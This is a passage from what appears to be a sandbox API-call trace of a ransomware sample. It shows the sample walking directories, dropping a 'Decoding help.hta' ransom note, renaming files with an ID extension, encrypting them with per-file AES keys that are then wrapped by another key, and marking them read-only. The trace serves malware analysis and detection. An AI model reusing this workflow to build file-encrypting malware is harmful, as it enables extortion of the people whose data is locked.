dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x508 [0058.255] CreateFileMappingA (hFile=0x508, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa38 [0058.255] CryptAcquireContextA (in: phProv=0x1dd5fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1dd5fcec*=0x3449798) returned 1 [0060.189] CryptGenKey (in: hProv=0x3449798, Algid=0x6610, dwFlags=0x1, phKey=0x1dd5fce8 | out: phKey=0x1dd5fce8*=0x42cf4d8) returned 1 [0060.189] CryptExportKey (in: hKey=0x42cf4d8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1dd5fbe4, pdwDataLen=0x1dd5fce4 | out: pbData=0x1dd5fbe4*, pdwDataLen=0x1dd5fce4*=0x2c) returned 1 [0060.189] MapViewOfFile (hFileMappingObject=0xa38, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaf80) returned 0x44a0000 [0063.310] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1dd5fbe4*, pdwDataLen=0x1dd5fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1dd5fbe4*, pdwDataLen=0x1dd5fcf8*=0x100) returned 1 [0063.321] CryptEncrypt (hKey=0x42cf4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44a0000, pdwDataLen=0x1dd5fce4*=0xaf80, dwBufLen=0xaf80) Thread: id = 454 os_tid = 0x5c4 [0045.028] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*.*", lpFindFileData=0x1de9fd30 | out: lpFindFileData=0x1de9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0045.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.446] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x1de9fd30 | out: lpFindFileData=0x1de9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.447] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.447] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.447] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x1de9fd30 | out: lpFindFileData=0x1de9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 1 [0045.447] lstrcmpW (lpString1=".", lpString2="14") returned -1 [0045.447] lstrcmpW (lpString1="..", lpString2="14") returned -1 [0045.447] lstrcmpiW (lpString1="windows", lpString2="14") returned 1 [0048.572] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*.*" [0048.572] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*.*") returned 76 [0048.572] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\", lpString2="14" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14" [0048.572] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*.*" [0048.572] GlobalMemoryStatus (in: lpBuffer=0x1de9fd10 | out: lpBuffer=0x1de9fd10) [0048.572] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11143b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x548 [0048.587] CloseHandle (hObject=0x548) returned 1 [0048.587] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x1de9fd30 | out: lpFindFileData=0x1de9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 0 [0048.587] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 455 os_tid = 0x788 [0045.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*", lpFindFileData=0x1dfdfd30 | out: lpFindFileData=0x1dfdfd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2a70 [0045.037] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.037] FindNextFileW (in: hFindFile=0x5e2a70, lpFindFileData=0x1dfdfd30 | out: lpFindFileData=0x1dfdfd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.037] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.037] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.037] FindNextFileW (in: hFindFile=0x5e2a70, lpFindFileData=0x1dfdfd30 | out: lpFindFileData=0x1dfdfd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0045.037] lstrcmpW (lpString1=".", lpString2="Profiles") returned -1 [0045.037] lstrcmpW (lpString1="..", lpString2="Profiles") returned -1 [0045.037] lstrcmpiW (lpString1="windows", lpString2="Profiles") returned 1 [0045.037] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*" [0045.037] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*") returned 44 [0045.037] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\", lpString2="Profiles" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" [0045.037] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*" [0045.038] GlobalMemoryStatus (in: lpBuffer=0x1dfdfd10 | out: lpBuffer=0x1dfdfd10) [0045.038] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99a2cc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x230 [0045.052] CloseHandle (hObject=0x230) returned 1 [0045.052] FindNextFileW (in: hFindFile=0x5e2a70, lpFindFileData=0x1dfdfd30 | out: lpFindFileData=0x1dfdfd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 0 [0045.052] FindClose (in: hFindFile=0x5e2a70 | out: hFindFile=0x5e2a70) returned 1 Thread: id = 456 os_tid = 0x780 [0045.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*", lpFindFileData=0x1e11fd30 | out: lpFindFileData=0x1e11fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8250 [0045.268] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.268] FindNextFileW (in: hFindFile=0x5d8250, lpFindFileData=0x1e11fd30 | out: lpFindFileData=0x1e11fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.268] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.268] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.268] FindNextFileW (in: hFindFile=0x5d8250, lpFindFileData=0x1e11fd30 | out: lpFindFileData=0x1e11fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0045.268] lstrcpyW (in: lpString1=0x10e25c90, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*" [0045.268] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*") returned 79 [0045.268] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Decoding help.hta" [0045.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\decoding help.hta")) returned 0xffffffff [0045.268] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0045.518] WriteFile (in: hFile=0x37c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1e11fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1e11fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.519] CloseHandle (hObject=0x37c) returned 1 [0045.519] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.712] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Proof.cab") returned -1 [0048.712] lstrlenW (lpString="Proof.cab") returned 9 [0048.712] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*" [0048.713] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*") returned 79 [0048.713] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpString2="Proof.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" [0048.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" [0048.713] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0048.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0055.281] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0055.281] CreateFileMappingA (hFile=0x3b0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x2f8 [0055.282] CryptAcquireContextA (in: phProv=0x1e11fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1e11fcec*=0x3449f08) returned 1 [0059.620] CryptGenKey (in: hProv=0x3449f08, Algid=0x6610, dwFlags=0x1, phKey=0x1e11fce8 | out: phKey=0x1e11fce8*=0x5d8a10) returned 1 [0059.620] CryptExportKey (in: hKey=0x5d8a10, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1e11fbe4, pdwDataLen=0x1e11fce4 | out: pbData=0x1e11fbe4*, pdwDataLen=0x1e11fce4*=0x2c) returned 1 [0059.620] MapViewOfFile (hFileMappingObject=0x2f8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x17ba0000 [0059.629] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1e11fbe4*, pdwDataLen=0x1e11fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1e11fbe4*, pdwDataLen=0x1e11fcf8*=0x100) returned 1 [0059.630] CryptEncrypt (in: hKey=0x5d8a10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x17ba0000, pdwDataLen=0x1e11fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x17ba0000*, pdwDataLen=0x1e11fce4*=0x100000) returned 1 [0059.800] UnmapViewOfFile (lpBaseAddress=0x17ba0000) returned 1 [0059.812] CloseHandle (hObject=0x2f8) returned 1 [0059.812] CryptDestroyKey (hKey=0x5d8a10) returned 1 [0059.812] CryptReleaseContext (hProv=0x3449f08, dwFlags=0x0) returned 1 [0059.812] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.812] WriteFile (in: hFile=0x3b0, lpBuffer=0x1e11fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1e11fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1e11fbe4*, lpNumberOfBytesWritten=0x1e11fcf8*=0x100, lpOverlapped=0x0) returned 1 [0060.806] WriteFile (in: hFile=0x3b0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1e11fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1e11fcf8*=0x500, lpOverlapped=0x0) returned 1 [0060.806] CloseHandle (hObject=0x3b0) returned 1 [0060.806] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0060.806] FindNextFileW (in: hFindFile=0x5d8250, lpFindFileData=0x1e11fd30 | out: lpFindFileData=0x1e11fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0060.892] lstrcpyW (in: lpString1=0x2ab11098, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*" [0060.892] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*") returned 79 [0060.892] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Decoding help.hta" [0060.892] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\decoding help.hta")) returned 0x1 [0060.892] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Proof.msi") returned -1 [0060.892] lstrlenW (lpString="Proof.msi") returned 9 [0060.892] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*" [0060.892] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*") returned 79 [0060.892] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpString2="Proof.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" [0060.892] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" [0060.892] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0060.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.893] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xdc0 [0060.893] CreateFileMappingA (hFile=0xdc0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xdbc [0060.893] CryptAcquireContextA (phProv=0x1e11fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 457 os_tid = 0x590 [0045.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*", lpFindFileData=0x1e25fd30 | out: lpFindFileData=0x1e25fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5bf0 [0045.281] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.281] FindNextFileW (in: hFindFile=0x5a5bf0, lpFindFileData=0x1e25fd30 | out: lpFindFileData=0x1e25fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.281] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.283] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.283] FindNextFileW (in: hFindFile=0x5a5bf0, lpFindFileData=0x1e25fd30 | out: 